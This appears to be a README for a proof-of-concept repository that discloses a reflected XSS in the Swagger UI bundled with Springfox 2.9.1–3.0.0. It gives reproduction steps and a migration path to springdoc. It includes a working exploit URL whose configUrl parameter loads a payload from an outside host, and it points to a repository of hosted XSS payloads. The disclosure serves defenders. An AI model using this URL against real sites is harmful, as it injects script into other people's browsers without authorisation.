Example application was copied from: https://github.com/evrentan/my-swagger-ui-example
All credit for code goes to: evrentan for providing the excellent example code!
Package: springfox-swagger-ui
Versions Affected: [2.9.1, 3.0.0]
Type of Issue: Reflected XSS
Payload/PoC: ?configUrl=https://xss.smarpo.com/test.json -- Append this to end of the Swagger UI URL and an alert dialog should fire.
- eg.
https://example.com/swagger-ui/index.html?configUrl=https://xss.smarpo.com/test.json
If your application bundles the Swagger UI using one of the many Springfox packages (2.9.1 to 3.0.0 versions) AND you make the Swagger UI "routable" (aka, it can be loaded in a browser), your application has an XSS issue.
For example, if your app includes springfox-boot-starter:3.0.0 and your Swagger UI is available at https://localhost/swagger -- you are vulnerable.
For example, if your app includes springfox-swagger-ui:2.10.5 and your Swagger UI is available at: https://example.com/swagger/swagger-ui -- you are vulnerable.
Springfox is a commonly used library for JVM-based languages to easily provide JSON documentation. Springfox includes a vulnerable version of the Swagger UI with known XSS vulnerabilities.
The vulnerable Swagger UI bundled version is shown at: https://github.com/springfox/springfox/blob/master/springfox-swagger-ui/build.gradle#L24
- Run:
docker build -t springfox-xss . - Run:
docker run -p 8080:8080 springfox-xssand wait for the springboot app to spin-up - Navigate to: http://localhost:8080/swagger-ui/index.html?configUrl=https://xss.smarpo.com/test.json
Ensure you have JDK 11 available to properly build this.
- Run:
mvn spring-boot:run - Navigate to: http://localhost:8080/swagger-ui/index.html?configUrl=https://xss.smarpo.com/test.json
XSS Payloads are hosted at: seanmarpo/swagger-xss-payloads
Good news, bad news. Springfox appears to no longer be maintained, however springdoc-openapi is a drop-in replacement that is actively being maintained.
The migration guide to springdoc from springfox can be found at: https://springdoc.org/#migrating-from-springfox.
GNU General Public License v3.0 Permissions of this strong copyleft license are conditioned on making available complete source code of licensed works and modifications, which include larger works using a licensed work, under the same license. Copyright and license notices must be preserved. Contributors provide an express grant of patent rights.